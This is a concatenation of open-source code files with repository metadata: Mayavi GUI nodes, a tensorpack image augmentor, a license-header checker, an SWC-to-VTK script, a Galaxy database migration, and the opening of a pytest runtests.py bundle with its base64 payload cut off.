self.object.menu_helper.open_file_action()
def _is_action_suitable(self, object, src):
return True
###############################################################################
# ModuleAdderNode class
###############################################################################
class ModuleAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add modules.
"""
# String to be shown in the TreeEditor.
label = Str('Add a visualization module')
# The icon of the displayed objects
icon_name = Str('module.ico')
# A reference to the registry, to generate this list.
items_list_source = registry.modules
def _object_changed(self, value):
if value is not None:
value.menu_helper._build_filter_actions()
ListAdderNode._object_changed(self, value)
###############################################################################
# FilterAdderNode class
###############################################################################
class FilterAdderNode(ListAdderNode):
""" Tree node that presents a view to the user to add filters.
"""
# String to be shown in the TreeEditor.
label = Str('Add a processing filter')
# The icon of the displayed objects
icon_name = Str('filter.ico')
# A reference to the registry, to generate this list.
items_list_source = registry.filters
###############################################################################
# ModuleFilterAdderNode class
###############################################################################
class ModuleFilterAdderNode(AdderNode):
""" Tree node that presents a view to the user to add filter and
modules.
"""
# The string to display on the icon in the TreeEditor.
label = 'Add module or filter'
# An adder node for modules
modules = Instance(ModuleAdderNode, ())
# An adder node for filters
filters = Instance(FilterAdderNode, ())
def _object_changed(self):
""" Propagate the object to the sub nodes.
"""
self.filters.object = self.object
self.modules.object = self.object
# Trait view to show in the Mayavi current object panel.
view = View(
Group(Item('modules', style='custom', springy=True,
resizable=True,
height=1.,
),
show_labels=False,
label='Visualization modules'),
Group(Item('filters', style='custom', springy=True,
resizable=True,
height=1.,
),
show_labels=False,
label='Processing filters'),
)
### EOF #######################################################################
|
dmsurti/mayavi
|
mayavi/core/adder_node.py
|
Python
|
bsd-3-clause
| 13,361
|
[
"Mayavi"
] |
cbe6ddb9edc3db4f2421570ba4d0bf8d065a775c7bec67cbba1cc54592d82a69
|
# -*- coding: utf-8 -*-
# File: deform.py
from .base import ImageAugmentor
from ...utils import logger
import numpy as np
__all__ = []
# Code was temporarily kept here for a future reference in case someone needs it
# But it was already deprecated,
# because this augmentation is not a general one that people will often find helpful.
class GaussianMap(object):
""" Generate Gaussian weighted deformation map"""
# TODO really needs speedup
def __init__(self, image_shape, sigma=0.5):
assert len(image_shape) == 2
self.shape = image_shape
self.sigma = sigma
def get_gaussian_weight(self, anchor):
"""
Args:
anchor: coordinate of the center
"""
ret = np.zeros(self.shape, dtype='float32')
y, x = np.mgrid[:self.shape[0], :self.shape[1]]
y = y.astype('float32') / ret.shape[0] - anchor[0]
x = x.astype('float32') / ret.shape[1] - anchor[1]
g = np.exp(-(x**2 + y ** 2) / self.sigma)
# cv2.imshow(" ", g)
# cv2.waitKey()
return g
def np_sample(img, coords):
# a numpy implementation of ImageSample layer
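    # Bilinear interpolation: clip the float coordinates to the image,
    # take the four surrounding integer pixels and blend them with
    # weights given by the fractional offsets.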
coords = np.maximum(coords, 0)
coords = np.minimum(coords, np.array([img.shape[0] - 1, img.shape[1] - 1]))
lcoor = np.floor(coords).astype('int32')
ucoor = lcoor + 1
ucoor = np.minimum(ucoor, np.array([img.shape[0] - 1, img.shape[1] - 1]))
diff = coords - lcoor
neg_diff = 1.0 - diff
lcoory, lcoorx = np.split(lcoor, 2, axis=2)
ucoory, ucoorx = np.split(ucoor, 2, axis=2)
diff = np.repeat(diff, 3, 2).reshape((diff.shape[0], diff.shape[1], 2, 3))
neg_diff = np.repeat(neg_diff, 3, 2).reshape((diff.shape[0], diff.shape[1], 2, 3))
diffy, diffx = np.split(diff, 2, axis=2)
ndiffy, ndiffx = np.split(neg_diff, 2, axis=2)
ret = img[lcoory, lcoorx, :] * ndiffx * ndiffy + \
img[ucoory, ucoorx, :] * diffx * diffy + \
img[lcoory, ucoorx, :] * ndiffy * diffx + \
img[ucoory, lcoorx, :] * diffy * ndiffx
return ret[:, :, 0, :]
class GaussianDeform(ImageAugmentor):
"""
Some kind of slow deformation I made up. Don't count on it.
"""
# TODO input/output with different shape
def __init__(self, anchors, shape, sigma=0.5, randrange=None):
"""
Args:
anchors (list): list of center coordinates in range [0,1].
shape(list or tuple): image shape in [h, w].
sigma (float): sigma for Gaussian weight
randrange (int): offset range. Defaults to shape[0] / 8
"""
logger.warn("GaussianDeform is slow. Consider using it with 4 or more prefetching processes.")
super(GaussianDeform, self).__init__()
self.anchors = anchors
self.K = len(self.anchors)
self.shape = shape
self.grid = np.mgrid[0:self.shape[0], 0:self.shape[1]].transpose(1, 2, 0)
self.grid = self.grid.astype('float32') # HxWx2
gm = GaussianMap(self.shape, sigma=sigma)
self.gws = np.array([gm.get_gaussian_weight(ank)
for ank in self.anchors], dtype='float32') # KxHxW
self.gws = self.gws.transpose(1, 2, 0) # HxWxK
if randrange is None:
self.randrange = self.shape[0] / 8
else:
self.randrange = randrange
self.sigma = sigma
def _get_augment_params(self, img):
v = self.rng.rand(self.K, 2).astype('float32') - 0.5
v = v * 2 * self.randrange
return v
def _augment(self, img, v):
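        # Displace the sampling grid by the Gaussian-weighted sum of the
        # per-anchor random offsets v (HxWxK dot Kx2 -> HxWx2), then
        # resample the image at the deformed coordinates.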
grid = self.grid + np.dot(self.gws, v)
return np_sample(img, grid)
def _augment_coords(self, coords, param):
raise NotImplementedError()
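# A minimal usage sketch (illustrative, not part of the original module);
# the anchor positions, shape and randrange below are made-up values:
#
#   aug = GaussianDeform(anchors=[(0.25, 0.25), (0.25, 0.75),
#                                 (0.75, 0.25), (0.75, 0.75)],
#                        shape=(224, 224), sigma=0.5, randrange=20)
#   deformed = aug.augment(img)   # img: HxWx3 array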
|
eyaler/tensorpack
|
tensorpack/dataflow/imgaug/deform.py
|
Python
|
apache-2.0
| 3,718
|
[
"Gaussian"
] |
b0aeda6dd9d36cf53cdc168386bd109dca80677ef63e97d955a479253a501692
|
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import difflib
import glob
import json
import mmap
import os
import re
import sys
parser = argparse.ArgumentParser()
parser.add_argument(
"filenames",
help="list of files to check, all files if unspecified",
nargs='*')
# Rootdir defaults to the directory **above** the repo-infra dir.
rootdir = os.path.dirname(__file__) + "/../../../"
rootdir = os.path.abspath(rootdir)
parser.add_argument(
"--rootdir", default=rootdir, help="root directory to examine")
default_boilerplate_dir = os.path.join(rootdir, "cluster-capacity/verify/boilerplate")
parser.add_argument(
"--boilerplate-dir", default=default_boilerplate_dir)
parser.add_argument(
"-v", "--verbose",
help="give verbose output regarding why a file does not pass",
action="store_true")
args = parser.parse_args()
verbose_out = sys.stderr if args.verbose else open("/dev/null", "w")
def get_refs():
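    # Build a map from file extension (taken from boilerplate.<ext>.txt)
    # to the expected license header, split into lines.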
refs = {}
for path in glob.glob(os.path.join(args.boilerplate_dir, "boilerplate.*.txt")):
extension = os.path.basename(path).split(".")[1]
ref_file = open(path, 'r')
ref = ref_file.read().splitlines()
ref_file.close()
refs[extension] = ref
return refs
def file_passes(filename, refs, regexs):
try:
f = open(filename, 'r')
except Exception as exc:
print("Unable to open %s: %s" % (filename, exc), file=verbose_out)
return False
data = f.read()
f.close()
basename = os.path.basename(filename)
extension = file_extension(filename)
if extension != "":
ref = refs[extension]
else:
ref = refs[basename]
# remove build tags from the top of Go files
if extension == "go":
p = regexs["go_build_constraints"]
(data, found) = p.subn("", data, 1)
    # remove shebang from the top of shell and python files
if extension == "sh" or extension == "py":
p = regexs["shebang"]
(data, found) = p.subn("", data, 1)
data = data.splitlines()
# if our test file is smaller than the reference it surely fails!
if len(ref) > len(data):
print('File %s smaller than reference (%d < %d)' %
(filename, len(data), len(ref)),
file=verbose_out)
return False
# trim our file to the same number of lines as the reference file
data = data[:len(ref)]
p = regexs["year"]
for d in data:
if p.search(d):
print('File %s is missing the year' % filename, file=verbose_out)
return False
    # Replace the first occurrence of the date regex (2014|2015|2016|2017) with "YEAR"
p = regexs["date"]
for i, d in enumerate(data):
(data[i], found) = p.subn('YEAR', d)
if found != 0:
break
# if we don't match the reference at this point, fail
if ref != data:
print("Header in %s does not match reference, diff:" % filename, file=verbose_out)
if args.verbose:
print(file=verbose_out)
for line in difflib.unified_diff(ref, data, 'reference', filename, lineterm=''):
print(line, file=verbose_out)
print(file=verbose_out)
return False
return True
def file_extension(filename):
return os.path.splitext(filename)[1].split(".")[-1].lower()
skipped_dirs = ['Godeps', 'third_party', '_gopath', '_output', '.git',
'cluster/env.sh', 'vendor', 'test/e2e/generated/bindata.go',
'cluster-capacity/verify/boilerplate/test', '.glide']
def normalize_files(files):
newfiles = []
for pathname in files:
if any(x in pathname for x in skipped_dirs):
continue
newfiles.append(pathname)
for i, pathname in enumerate(newfiles):
if not os.path.isabs(pathname):
newfiles[i] = os.path.join(args.rootdir, pathname)
return newfiles
def get_files(extensions):
files = []
if len(args.filenames) > 0:
files = args.filenames
else:
for root, dirs, walkfiles in os.walk(args.rootdir):
# don't visit certain dirs. This is just a performance improvement
# as we would prune these later in normalize_files(). But doing it
# cuts down the amount of filesystem walking we do and cuts down
# the size of the file list
for d in skipped_dirs:
if d in dirs:
dirs.remove(d)
for name in walkfiles:
pathname = os.path.join(root, name)
files.append(pathname)
files = normalize_files(files)
outfiles = []
for pathname in files:
basename = os.path.basename(pathname)
extension = file_extension(pathname)
if extension in extensions or basename in extensions:
outfiles.append(pathname)
return outfiles
def get_regexs():
regexs = {}
# Search for "YEAR" which exists in the boilerplate, but shouldn't in the real thing
regexs["year"] = re.compile( 'YEAR' )
    # dates can be 2014 through 2017, company holder names can be anything
regexs["date"] = re.compile( '(2014|2015|2016|2017)' )
# strip // +build \n\n build constraints
regexs["go_build_constraints"] = re.compile(r"^(// \+build.*\n)+\n", re.MULTILINE)
# strip #!.* from shell scripts
regexs["shebang"] = re.compile(r"^(#!.*\n)\n*", re.MULTILINE)
return regexs
def main():
regexs = get_regexs()
refs = get_refs()
filenames = get_files(refs.keys())
for filename in filenames:
if not file_passes(filename, refs, regexs):
print(filename, file=sys.stdout)
return 0
if __name__ == "__main__":
sys.exit(main())
|
hodovska/cluster-capacity
|
verify/boilerplate/boilerplate.py
|
Python
|
apache-2.0
| 6,314
|
[
"VisIt"
] |
70b61e53977c7cf756f769d0c7dd9c140b3270b260bd338cdfbefc1fbf5cdc22
|
# -*- coding: utf-8 -*-
import os
import swc2vtk
import swcfilelist
# input_dir = '/home/nebula/git/LAL-VPCmapping/converted_swc'
input_dir = './swc'
output_dir = '/home/nebula/work/paraview/standardbrain20170131/'
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
filelist = swcfilelist.filelist_lalvpc
vtkgen = swc2vtk.VtkGenerator()
for filename in filelist:
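    # Add each SWC twice: once as-is and once mirrored in x (shifted by the
    # assumed 1024-voxel image width), so both hemispheres end up in one file.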
vtkgen.add_swc(os.path.join(input_dir, filename + '.swc'))
vtkgen.add_swc(os.path.join(input_dir, filename + '.swc'), inv_x=True, shift_x=1024.0)
vtkgen.write_vtk(os.path.join(output_dir, 'all.vtk'), coloring=True, normalize_diam=True, radius_data=True)
|
DaisukeMiyamoto/swc2vtk
|
examples/append_allswc.py
|
Python
|
apache-2.0
| 639
|
[
"ParaView",
"VTK"
] |
bacc18099410147c56346216fddaba36a98d91c1b2744e210393b547f18fb5da
|
"""
Migration script to create the tool_version and tool_version_association tables and drop the tool_id_guid_map table.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import datetime
now = datetime.datetime.utcnow
# Need our custom types, but don't import anything else from model
from galaxy.model.custom_types import *
from galaxy.model.custom_types import _sniffnfix_pg9_hex
from galaxy.util.json import loads, dumps
import sys, logging
log = logging.getLogger( __name__ )
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler( sys.stdout )
format = "%(name)s %(levelname)s %(asctime)s %(message)s"
formatter = logging.Formatter( format )
handler.setFormatter( formatter )
log.addHandler( handler )
metadata = MetaData()
#migrate_engine = scoped_session( sessionmaker( bind=migrate_engine, autoflush=False, autocommit=True ) )
def nextval( table, col='id' ):
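    # Dialect-specific primary-key value for raw INSERTs: postgres needs an
    # explicit nextval() on the sequence, mysql/sqlite autoincrement on null.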
if migrate_engine.name == 'postgres':
return "nextval('%s_%s_seq')" % ( table, col )
elif migrate_engine.name == 'mysql' or migrate_engine.name == 'sqlite':
return "null"
else:
raise Exception( 'Unable to convert data for unknown database type: %s' % migrate_engine.name )
def localtimestamp():
if migrate_engine.name == 'postgres' or migrate_engine.name == 'mysql':
return "LOCALTIMESTAMP"
elif migrate_engine.name == 'sqlite':
return "current_date || ' ' || current_time"
else:
        raise Exception( 'Unable to convert data for unknown database type: %s' % migrate_engine.name )
ToolVersion_table = Table( "tool_version", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "tool_id", String( 255 ) ),
Column( "tool_shed_repository_id", Integer, ForeignKey( "tool_shed_repository.id" ), index=True, nullable=True ) )
ToolVersionAssociation_table = Table( "tool_version_association", metadata,
Column( "id", Integer, primary_key=True ),
Column( "tool_id", Integer, ForeignKey( "tool_version.id" ), index=True, nullable=False ),
Column( "parent_id", Integer, ForeignKey( "tool_version.id" ), index=True, nullable=False ) )
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print __doc__
ToolIdGuidMap_table = Table( "tool_id_guid_map", metadata, autoload=True )
metadata.reflect()
# Create the tables.
try:
ToolVersion_table.create()
except Exception, e:
log.debug( "Creating tool_version table failed: %s" % str( e ) )
try:
ToolVersionAssociation_table.create()
except Exception, e:
log.debug( "Creating tool_version_association table failed: %s" % str( e ) )
# Populate the tool table with tools included in installed tool shed repositories.
cmd = "SELECT id, metadata FROM tool_shed_repository"
result = migrate_engine.execute( cmd )
count = 0
for row in result:
if row[1]:
tool_shed_repository_id = row[0]
repository_metadata = loads( _sniffnfix_pg9_hex( str( row[1] ) ) )
# Create a new row in the tool table for each tool included in repository. We will NOT
# handle tool_version_associaions because we do not have the information we need to do so.
tools = repository_metadata.get( 'tools', [] )
for tool_dict in tools:
cmd = "INSERT INTO tool_version VALUES (%s, %s, %s, '%s', %s)" % \
( nextval( 'tool_version' ), localtimestamp(), localtimestamp(), tool_dict[ 'guid' ], tool_shed_repository_id )
migrate_engine.execute( cmd )
count += 1
print "Added %d rows to the new tool_version table." % count
# Drop the tool_id_guid_map table since the 2 new tables render it unnecessary.
try:
ToolIdGuidMap_table.drop()
except Exception, e:
log.debug( "Dropping tool_id_guid_map table failed: %s" % str( e ) )
def downgrade(migrate_engine):
metadata.bind = migrate_engine
ToolIdGuidMap_table = Table( "tool_id_guid_map", metadata,
Column( "id", Integer, primary_key=True ),
Column( "create_time", DateTime, default=now ),
Column( "update_time", DateTime, default=now, onupdate=now ),
Column( "tool_id", String( 255 ) ),
Column( "tool_version", TEXT ),
Column( "tool_shed", TrimmedString( 255 ) ),
Column( "repository_owner", TrimmedString( 255 ) ),
Column( "repository_name", TrimmedString( 255 ) ),
Column( "guid", TEXT, index=True, unique=True ) )
metadata.reflect()
try:
ToolVersionAssociation_table.drop()
except Exception, e:
log.debug( "Dropping tool_version_association table failed: %s" % str( e ) )
try:
ToolVersion_table.drop()
except Exception, e:
log.debug( "Dropping tool_version table failed: %s" % str( e ) )
try:
ToolIdGuidMap_table.create()
except Exception, e:
log.debug( "Creating tool_id_guid_map table failed: %s" % str( e ) )
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/lib/galaxy/model/migrate/versions/0091_add_tool_version_tables.py
|
Python
|
gpl-3.0
| 5,125
|
[
"Galaxy"
] |
99e9ad15c6dc830ec3bba8964bf554de1faf2b2fff3432dba6a496ae50a5294b
|
#! /usr/bin/env python
# Hi There!
# You may be wondering what this giant blob of binary data here is, you might
# even be worried that we're up to something nefarious (good for you for being
# paranoid!). This is a base64 encoding of a zip file, this zip file contains
# a fully functional basic pytest script.
#
# Pytest is a thing that tests packages, pytest itself is a package that some-
# one might want to install, especially if they're looking to run tests inside
# some package they want to install. Pytest has a lot of code to collect and
# execute tests, and other such sort of "tribal knowledge" that has been en-
# coded in its code base. Because of this we basically include a basic copy
# of pytest inside this blob. We do this because it lets you as a maintainer
# or application developer who wants people who don't deal with python much to
# easily run tests without installing the complete pytest package.
#
# If you're wondering how this is created: you can create it yourself if you
# have a complete pytest installation by using this command on the command-
# line: ``py.test --genscript=runtests.py``.
sources = """
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
